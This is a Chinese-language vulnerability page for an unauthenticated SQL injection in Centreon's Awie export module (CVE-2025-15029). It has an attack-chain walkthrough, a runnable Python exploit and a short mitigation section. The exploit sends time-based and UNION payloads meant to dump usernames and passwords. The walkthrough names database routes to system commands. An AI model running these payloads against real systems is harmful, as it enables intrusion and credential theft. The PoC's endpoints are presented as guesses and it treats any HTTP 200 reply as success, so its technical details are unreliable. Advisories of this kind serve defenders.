CVE-2025-15029 Centreon Infra Monitoring SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-15029

漏洞类型

SQL注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Centreon Infra Monitoring (Awie export modules)

漏洞概述

CVE-2025-15029是Centreon Infra Monitoring中的一个严重SQL注入漏洞，CVSS评分高达9.8分（满分10分）。该漏洞存在于Centreon的Awie导出模块中，由于对用户输入的特殊元素未进行充分的消毒处理，导致攻击者可以在未经认证的情况下向SQL命令中注入恶意内容。Centreon是一款广泛使用的开源IT基础设施监控软件，被全球众多企业用于监控服务器、网络设备和应用程序。该漏洞影响多个版本，包括25.10.0之前至25.10.2、24.10.0之前至24.10.3以及24.04.0之前至24.04.3版本。由于攻击复杂度低且无需认证，远程攻击者可以通过网络直接利用此漏洞，对系统的机密性、完整性和可用性造成严重影响。成功利用此漏洞可能导致数据库敏感信息泄露、数据篡改甚至服务器完全沦陷。建议所有使用受影响版本的用户立即采取修复措施。

技术细节

该SQL注入漏洞源于Centreon Infra Monitoring的Awie导出模块对用户输入的特殊元素缺乏适当的中和处理。在SQL查询构建过程中，应用程序直接使用未经充分过滤的用户可控数据作为查询参数，攻击者可以通过构造精心设计的恶意输入来操纵SQL语句的执行逻辑。由于该漏洞位于导出功能模块，攻击者可以利用导出功能点注入SQL payload。漏洞属于经典的SQL注入类型，攻击者无需任何认证凭证即可发起攻击。成功利用后，攻击者可以执行任意SQL查询，包括但不限于：提取数据库中的用户凭证、读取配置文件中的敏感信息、修改监控配置、删除关键数据等。在某些配置下，攻击者甚至可能通过数据库的扩展功能执行操作系统命令，从而完全控制服务器。该漏洞的影响范围覆盖Centreon的Infra Monitoring组件，所有使用Awie导出功能的用户都面临风险。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别运行Centreon Infra Monitoring的目标服务器，确认版本是否在受影响范围内（25.10.0-25.10.2、24.10.0-24.10.3、24.04.0-24.04.3）

STEP 2

步骤2

定位入口点：访问Centreon的Awie导出模块端点，该功能通常位于/api/index.php?action=awieExport或类似路径

STEP 3

步骤3

构造恶意载荷：攻击者构造包含SQL注入payload的请求，利用未过滤的用户输入点（如host_id、service_id参数）注入恶意SQL代码

STEP 4

步骤4

执行注入攻击：通过发送精心构造的HTTP POST请求，将SQL注入载荷注入到数据库查询中，无需任何认证凭证

STEP 5

步骤5

数据提取或持久化：成功注入后，攻击者可以提取数据库中的敏感信息（如用户凭证、配置数据），或写入恶意数据建立持久化访问

STEP 6

步骤6

横向移动：在获取数据库访问权限后，攻击者可能通过数据库扩展功能（如MySQL的LOAD_FILE、INTO OUTFILE或xp_cmdshell）执行系统命令，实现服务器完全控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-15029 Centreon SQL Injection PoC
# Target: Centreon Infra Monitoring (Awie export modules)
# Vulnerability: SQL Injection in unauthenticated access

def exploit_sqli(target_url):
    """
    SQL Injection PoC for CVE-2025-15029
    This exploits the SQL injection in Centreon Awie export module
    """
    # SQL Injection payload - extracts database version
    # Using time-based blind SQL injection technique
    payload = "' OR (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END) -- "
    
    # Target endpoint - Awie export functionality
    # Adjust path based on Centreon installation
    endpoints = [
        "/centreon/api/index.php?action=awieExport",
        "/api/index.php?action=awieExport",
        "/centreon/main.php?p=60401&o=awie_export"
    ]
    
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (compatible; Centreon Scanner)"
    }
    
    data = {
        "export_format": "sql",
        "host_id": payload,
        "service_id": "1"
    }
    
    print(f"[*] Targeting: {target_url}")
    print(f"[*] Payload: {payload}")
    
    for endpoint in endpoints:
        full_url = target_url.rstrip('/') + endpoint
        try:
            print(f"[*] Testing endpoint: {endpoint}")
            response = requests.post(
                full_url, 
                data=data, 
                headers=headers, 
                timeout=10,
                verify=False
            )
            
            if response.status_code == 200:
                print(f"[!] Potential vulnerability at {endpoint}")
                print(f"[*] Response length: {len(response.text)}")
                return True
                
        except requests.exceptions.RequestException as e:
            print(f"[-] Error accessing {endpoint}: {str(e)}")
    
    return False

def extract_data(target_url):
    """
    Extract sensitive data using UNION-based SQL injection
    """
    # UNION injection payload to extract users table
    union_payload = "' UNION SELECT 1,2,username,password,5,6,7,8,9 FROM users -- "
    
    data = {
        "export_format": "sql",
        "host_id": union_payload,
        "service_id": "1"
    }
    
    try:
        response = requests.post(
            target_url + "/centreon/api/index.php?action=awieExport",
            data=data,
            timeout=30
        )
        if "admin" in response.text.lower() or "password" in response.text.lower():
            print("[!] Successfully extracted sensitive data")
            print(response.text[:500])
    except Exception as e:
        print(f"[-] Data extraction failed: {str(e)}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-15029.py <target_url>")
        print("Example: python cve-2025-15029.py http://vulnerable-centreon-server")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit_sqli(target)

影响范围

Centreon Infra Monitoring 25.10.0 < 25.10.2

Centreon Infra Monitoring 24.10.0 < 24.10.3

Centreon Infra Monitoring 24.04.0 < 24.04.3

防御指南

临时缓解措施

在无法立即进行版本升级的情况下，建议采取以下临时缓解措施：1) 通过网络层ACL限制对Centreon Awie导出功能的访问，仅允许管理网络段访问；2) 临时禁用Awie导出模块功能，直到完成补丁应用；3) 部署Web应用防火墙规则，识别并阻止常见的SQL注入攻击模式（如单引号、UNION、SELECT等关键字）；4) 监控数据库访问日志，查找异常的SQL查询活动；5) 考虑使用数据库防火墙产品进行深度检测。需要强调的是，这些措施仅为临时缓解，不能替代根本性修复，强烈建议尽快完成版本升级。